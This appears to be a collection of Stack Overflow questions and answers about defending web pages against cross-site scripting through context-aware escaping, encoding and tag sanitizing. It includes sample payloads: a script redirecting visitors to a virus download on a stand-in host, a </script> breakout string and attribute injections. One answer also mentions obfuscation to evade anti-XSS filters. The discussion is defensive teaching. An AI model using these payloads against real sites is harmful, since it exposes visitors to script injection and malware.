Protect XSS issue only by replacing '<' and '>' - html

I would like to know whether I can protect my website against XSS attacks by replacing ONLY < and > with &lt; and &gt;, or whether I am missing something.
Example :
<?php echo '<div>' . $escaped . '</div>' ?>
I already know about the PHP function htmlspecialchars and its relatives.

No, for the HTML body you will also need to encode the & character to prevent an attacker from potentially escaping the escape.
Check out the XSS Experimental Minimal Encoding Rules:
HTML Body (up to HTML 4.01):
HTML Entity encode < &
specify charset in metatag to avoid UTF7 XSS
XHTML Body:
HTML Entity encode < & >
limit input to charset http://www.w3.org/TR/2008/REC-xml-20081126/#charsets
Note that if you want to put data inside an attribute value, you need to properly encode all characters with special meaning. The XSS (Cross Site Scripting) Prevention Cheat Sheet recommends encoding the following characters:
&, <, >, ", ', /
You must also quote the attribute value for the escaping to be effective.
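As a minimal sketch of the rules above (written in JavaScript rather than PHP, and assuming a hypothetical helper name `escapeHtml` that is not part of any library), the six characters can be encoded in a single pass and the result placed inside a quoted attribute:

```javascript
// Hypothetical helper; the name and the exact entity spellings are illustrative choices.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

function escapeHtml(text) {
  // One pass over the input, so an "&" produced by a substitution is never encoded twice.
  return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

const userInput = `"><script>alert(1)</script>`;

// The attribute value is wrapped in double quotes, as the answer requires.
const html = `<input value="${escapeHtml(userInput)}">`;
console.log(html);
```

Encoding & as well means that text the user typed literally, such as &lt;, is shown back as typed instead of being decoded by the browser.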

The answer is no: someone will find a way to exploit it, somehow.
You are underestimating the number of techniques and the creativity of attackers. Read through the OWASP XSS Cheat Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet to get an idea of the number of ways this could happen. In your case, does it protect against an XSS into an onload attribute? Or into an input that becomes part of a CSS definition? In those situations the attacker is already inside a tag, so only JS code needs to be added and there is no reason to use '<' or '>'.
Deal with XSS at output time by escaping/encoding. It is the simplest thing and it will protect you everywhere; just do it every single time you write anything (no matter whether it comes from the user or not) and pay attention to the context (escape/encode for a URL when you are writing a link, escape/encode for JS when you are writing directly into a JS script, escape/encode for CSS when you are writing part of a CSS definition, escape/encode JSON when you write JSON data, escape/encode HTML in any other case).
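To illustrate the attribute case, here is a small JavaScript sketch. The payload and both function names are made up for the example; the first function reproduces the filter proposed in the question, the second also encodes quotes and ampersands.

```javascript
// The filter from the question: only angle brackets are replaced.
function escapeAngleBracketsOnly(text) {
  return String(text).replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Hypothetical encoder for a double-quoted attribute value.
function escapeAttribute(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first so later entities are not re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hypothetical attacker input: it contains no "<" or ">" at all.
const payload = `x" onmouseover="alert(1)`;

// The payload passes through unchanged and adds a new event-handler attribute.
const unsafeHtml = `<input value="${escapeAngleBracketsOnly(payload)}">`;
console.log(unsafeHtml); // <input value="x" onmouseover="alert(1)">

// With quotes encoded, the payload stays inside the value attribute.
const safeHtml = `<input value="${escapeAttribute(payload)}">`;
console.log(safeHtml); // <input value="x&quot; onmouseover=&quot;alert(1)">
```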
In addition, even if it is unrelated, I usually point to this site to show how creative people like to be with JS: http://www.jsfuck.com/. It is meant for obfuscation only, but I have used it to evade anti-XSS controls, usually ones made by a third party.

Related

Why these 5 (6?) characters are considered "unsafe" HTML characters?

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &amp;
" (double quote) is converted to &quot;
' (single quote) is converted to &#039; (only if the flag ENT_QUOTES is set)
< (less than) is converted to &lt;
> (greater than) is converted to &gt;
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I submit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone who visits your page is redirected to a virus download. The naive approach here is just to say, okay, well then let's filter out some of the important characters in that attack:
< and > will be replaced with &lt; and &gt; and now suddenly our script isn't a script. It's just some HTML-looking text.
A similar situation arises with a comment like
Something is <<wrong>> here.
Suppose a user used <<...>> for emphasis for some reason. Their comment would render as
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally be an HTML entity and end up looking very different and very odd to a user.
Consider the comment
I really like #455 &oacute; please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These characters are unsafe because in HTML < and > define a tag, " and ' are used to surround attribute values, and & is encoded because it introduces HTML entities. No other characters need to be encoded, but they can be: for example, the trademark symbol can be written as &trade;, the US dollar sign as &dollar; and the euro as &euro;. Any emoji can also be written as an HTML entity (the name of the encoded thing). You can find an explanation and examples here

Sanitize <script> element contents

Say that I want to provide some data to my client (in the first response, with no latency) via a dynamic <script> element.
<script><%= payload %></script>
Say that payload is the string var data = '</script><script>alert("Muahahaha!")';</script>. An end tag (</script>) will allow users to inject arbitrary scripts into my page. How do I properly sanitize the contents of my script element?
I figure I could change </script> to <\/script> and <!-- to <\!--. Are there any other dangerous strings I need to escape? Is there a better way to provide this "cold start" data?
Edited for non-mutation of data.
If I'm interpreting this correctly, you want to prevent the user from ending the script tag prematurely within the user-submitted string. That can be done for HTML just as you stated, by adding the backslash to the end tag: <\/script>. That is the only escaping you should have to worry about in that case. You shouldn't need to escape HTML comments, as the browser will interpret them as part of the JavaScript. If some older browsers do not correctly default script tags to the type text/javascript (language="javascript" is deprecated), adding type='text/javascript' may be necessary.
Based on Mike Samuel's answer here, I may have been wrong about not needing to escape HTML comments. However, I was not able to reproduce it in Chrome or Chromium.
Assuming that you're doing this:
Payload is set to
var data = '[this is user controlled data]';
and the rest of the code (assignment, quotes and semi-colon) is generated by your application, then the encoding you want is hex entity encoding.
See the OWASP XSS Prevention Cheat Sheet, Rule #3 for more information. This will convert
</script><script>alert("Muahahaha!")
into
var data = '\x3c\x2fscript\x3e\x3cscript\x3ealert\x28\x22Muahahaha\x21\x22\x29';
Try this and you will see this has the advantage of storing the user set string exactly correct, no matter what characters it contains. Additionally it takes care of single and double quote encoding. As a super bonus, it is also suitable for storing in HTML attributes:
<a onclick="alert('[user data]');" />
which normally would have to be HTML encoded again for correct display (because &amp; inside an HTML attribute is interpreted as &). However, hex entity encoding does not include any HTML characters with special meaning so you get two for the price of one.
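The encoding described above can be sketched in JavaScript as follows. The function name `escapeForJsString` is hypothetical, and the choice to leave only ASCII letters and digits unescaped is an assumption of this sketch, not a quotation of the OWASP rule.

```javascript
// Hypothetical helper: escape a value for use inside a quoted JavaScript string literal.
function escapeForJsString(text) {
  let out = "";
  for (const ch of String(text)) {
    const code = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch; // ASCII letters and digits pass through unchanged
    } else if (code < 0x100) {
      out += "\\x" + code.toString(16).padStart(2, "0"); // \xHH
    } else if (code < 0x10000) {
      out += "\\u" + code.toString(16).padStart(4, "0"); // \uHHHH
    } else {
      out += "\\u{" + code.toString(16) + "}"; // astral code points (ES2015 syntax)
    }
  }
  return out;
}

const userData = '</script><script>alert("Muahahaha!")';
const line = "var data = '" + escapeForJsString(userData) + "';";
console.log(line);
// var data = '\x3c\x2fscript\x3e\x3cscript\x3ealert\x28\x22Muahahaha\x21\x22\x29';
```

Because the output contains no <, >, &, quote or slash characters, the same string can sit inside a script block or an event-handler attribute without a second encoding step.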
Update from comments
The OP indicated that the server-side code would be generated in the form
var data = <%= JSON.stringify(data) %>;
The above still applies. It is up to the JSON class to properly hex entity encode values as they're inserted into the JSON. This cannot easily be done outside of the class, as you'd effectively have to parse the JSON again to determine the current language context. I wouldn't recommend going for the simple option of escaping the forward slash in </script>, because there are other sequences that can end the grammar context, such as CDATA closing tags. Escape properly and your code will be future-proof and secure.
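One commonly used alternative, offered here as an assumption rather than as what the answer prescribes, is to post-process the output of JSON.stringify. In that output the characters <, >, &, U+2028 and U+2029 can only occur inside string values, so replacing them with \uXXXX escapes (JSON has no \xHH form) keeps the JSON valid. The helper name `jsonForScript` is hypothetical, and the sketch assumes the value is JSON-serializable.

```javascript
// Hypothetical helper: serialize a value so it can be embedded in a <script> block.
// Assumes `value` is JSON-serializable (JSON.stringify returns a string for it).
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c") // blocks </script> and <!--
    .replace(/>/g, "\\u003e") // blocks --> and ]]>
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028") // line separators were not valid in older JS string literals
    .replace(/\u2029/g, "\\u2029");
}

const data = { name: '</script><script>alert("Muahahaha!")' };
const embedded = jsonForScript(data);
const scriptTag = "<script>var data = " + embedded + ";</" + "script>";
console.log(scriptTag);

// The escaped text is still valid JSON and decodes to the original value.
console.log(JSON.parse(embedded).name === data.name); // true
```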

Why do I need XSS library while I can use Html-encode?

I'm trying to understand why I need to use an XSS library when I can merely HTML-encode the data sent from the server to the client.
For example, here on Stackoverflow.com, in the editor, all the SO team needs to do is save the user input and display it HTML-encoded.
This way, there is never going to be an HTML tag that gets executed.
I'm probably wrong here, but can you please contradict my statement, or explain?
For example:
I know that an IMG tag, for example, can have onmouseover or onload attributes that a user can use to run malicious scripts, but the IMG won't even run in the browser as an IMG, since it's &lt;img&gt; and not <img>
So where is the problem?
HTML-encoding is itself one feature an “XSS library” might provide. This can be useful when the platform doesn't have a native HTML encoder (eg scriptlet-based JSP) or the native HTML encoder is inadequate (eg not escaping quotes for use in attributes, or ]]> if you're using XHTML, or #{} if you're worried about cross-origin-stylesheet-inclusion attacks).
There might also be other encoders for other situations, for example injecting into JavaScript strings in a <script> block or URL parameters in an href attribute, which are not provided directly by the platform/templating language.
Another useful feature an XSS library could provide might be HTML sanitisation, for when you want to allow the user to input data in HTML format, but restrict which tags and attributes they use to a safe whitelist.
Another less-useful feature an XSS library could provide might be automated scanning and filtering of input for HTML-special characters. Maybe this is the kind of feature you are objecting to? Certainly trying to handle HTML-injection (an output stage issue) at the input stage is a misguided approach that security tools should not be encouraging.
HTML encoding is only one aspect of making your output safe against XSS.
For example, if you output a string to JavaScript using this code:
<script>
var enteredName = '<%=EnteredNameVariableFromServer %>';
</script>
You will want to hex entity encode the variable for proper insertion into JavaScript, not HTML encode it. Suppose the value of EnteredNameVariableFromServer is O'leary; then the rendered code, when properly encoded, will become:
<script>
var enteredName = 'O\x27leary';
</script>
In this case this prevents the ' character from breaking out of the string and into the JavaScript code context, and also ensures proper treatment of the variable (HTML encoding it would result in the literal value of O&#39;leary being used in JavaScript, affecting processing and display of the value).
Side note:
Also, that's not quite true of Stack Overflow. Certain characters still have special meanings like in the <!-- language: lang-none --> tag. See this post on syntax highlighting if you're interested.

How to make browser ignore html tags

I have created a site where users can make an account by typing in a username and password. If I make an account and type <h1> dan</h1> as my username, the username will show up on the site as a header. This can lead to loads of abuse if someone were to use, say, an img src or a load of line breaks. How do I make the browser ignore the HTML tags, so that if I were to type <h1> dan</h1> it would either get rid of the HTML or just print out the HTML as regular text?
Various answers for some programming languages have already been given. You might want to read about the underlying techniques (as well as other common threats in web development) on http://www.owasp.org/.
Welcome to the world of security issues in web development
What you are talking about is called input validation. A lot of work has already been done on this subject, and it is never a good idea to start doing this from scratch. The most important thing to remember is that input validation has to be done on the server side, as client side can easily be manipulated.
ESAPI (by OWASP) is an open source library for web security which amongst other things lets you do Input Validation, it has implementations in many languages including PHP and Java. If you're interested in using ESAPI with Java you can take a look at my blog where I use ESAPI for input validation, if you're using another language there are examples for those on the web.
You can use the strip_tags() function in PHP.
Maybe you can strip HTML tags in your server-side code when you create the user.
Also:
I think it is a must to clean, on the server side, the values coming from the client side.
Either you'll have to get rid of all HTML tags, or (much simpler) replace all < and > characters with their HTML encodings, &lt; and &gt;.
Simply output the username using htmlspecialchars().
The translations performed are:
'&' (ampersand) becomes '&amp;'
'"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set.
"'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set.
'<' (less than) becomes '&lt;'
'>' (greater than) becomes '&gt;'
You can't do this in the browser, you have to do this in your backend.
Identify allowed characters in username,password, whatever value you ask for
When the form is submitted -> validate the input against your previously defined pattern (on the server)
Escape/encode your data before it is sent to the client (browser), i.e. so that <h1> dan</h1> would become &lt;h1&gt; dan&lt;/h1&gt;
Familiarize yourself with common security concerns, such as SQL injection and cross-site scripting, and with how to avoid them
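The steps above can be sketched as follows, in JavaScript for a server-side runtime. The username policy (letters, digits and underscore, 3 to 20 characters) and both function names are assumptions made for illustration only.

```javascript
// Hypothetical policy: 3 to 20 characters, ASCII letters, digits and underscore only.
const USERNAME_PATTERN = /^[A-Za-z0-9_]{3,20}$/;

// Server-side validation of submitted input against the predefined pattern.
function isValidUsername(name) {
  return typeof name === "string" && USERNAME_PATTERN.test(name);
}

// Output encoding, applied whenever a value is written into an HTML page.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

console.log(isValidUsername("<h1> dan</h1>")); // false
console.log(isValidUsername("dan_42")); // true
console.log(escapeHtml("<h1> dan</h1>")); // &lt;h1&gt; dan&lt;/h1&gt;
```

Validation rejects input that does not fit the expected shape, while encoding on output still protects values that were stored before the rule existed or that arrive from another source.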

Limiting HTML Input into Text Box

How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions?
I'd suggest a slightly different approach:
Don't filter incoming user data (beyond prevention of SQL injection). User data should be kept as pure as possible.
Filter all outgoing data from the database; this is where things like tag stripping should happen.
Keeping user data clean allows you more flexibility in how it's displayed. Filtering all outgoing data is a good habit to get into (along the lines of the "never trust data" meme).
You didn't state what the forum was built with, but if it's PHP, check out:
http://htmlpurifier.org/
Library Features: Whitelist, Removal, Well-formed, Nesting, Attributes, XSS safe, Standards safe
Once the text is submitted, you could strip any/all tags that don't match your predefined set using a regex in PHP.
It would look something like the following:
find open tag (<)
if contents != allowed tag, remove tag (from <..>)
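A more conservative variant of these steps, sketched in JavaScript rather than PHP, is to escape everything first and then restore only an exact set of attribute-less tags. The tag list and function names are assumptions for illustration; the sketch does not check that tags are balanced, and it is not a substitute for a full sanitizer library.

```javascript
// Hypothetical allowlist of tags that may appear, without any attributes.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "p"];

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

function allowBasicTags(input) {
  // Step 1: neutralize all markup.
  const escaped = escapeHtml(input);
  // Step 2: turn back only exact matches such as &lt;b&gt; or &lt;/b&gt;.
  const pattern = new RegExp(`&lt;(/?)(${ALLOWED_TAGS.join("|")})&gt;`, "gi");
  return escaped.replace(pattern, (_match, slash, tag) => `<${slash}${tag.toLowerCase()}>`);
}

console.log(allowBasicTags("<b>hi</b><script>alert(1)</script>"));
// <b>hi</b>&lt;script&gt;alert(1)&lt;/script&gt;
```

Any tag that carries attributes, such as <b onclick="...">, does not match the exact pattern and therefore stays escaped.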
Parse the input provided and strip out all HTML tags that don't exactly match the list you are allowing. This can either be a complex regex, or you can do a stateful iteration through the char[] of the input string, building the allowed output string and stripping unwanted attributes on tags like img.
Use a different code system (BBCode, Markdown)
Find some code online that already does this, to use as a basis for your implementation. For example Slashcode must perform this, so look for its implementation in the Perl and use the regexes (that I assume are there)
Regardless of what you use, be sure to be informed about what kind of HTML content can be dangerous.
e.g. a <script> tag is pretty obvious, but a <style> tag is just as bad in IE, because it can invoke JScript commands.
In fact, any style="..." attribute can invoke script in IE.
<object> would be one more tag to be wary of.
PHP comes with a simple function, strip_tags, to strip HTML tags. It allows certain tags to be exempted from stripping.
Example #1 strip_tags() example
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>
The above example will output:
Test paragraph. Other text
<p>Test paragraph.</p> Other text
Personally, for a forum, I would use BBCode or Markdown because of the amount of support and features provided, such as live preview.